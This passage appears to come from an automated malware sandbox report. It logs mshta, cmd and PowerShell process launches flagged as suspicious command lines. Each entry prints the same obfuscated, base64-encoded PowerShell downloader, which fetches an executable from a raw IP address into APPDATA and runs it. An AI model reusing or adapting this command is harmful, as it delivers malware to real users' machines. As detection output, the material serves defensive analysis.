LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"Jump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
            Suspicious command line found
            Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
            Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
            Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"Jump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"Jump to behavior
            Suspicious powershell command line found
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAg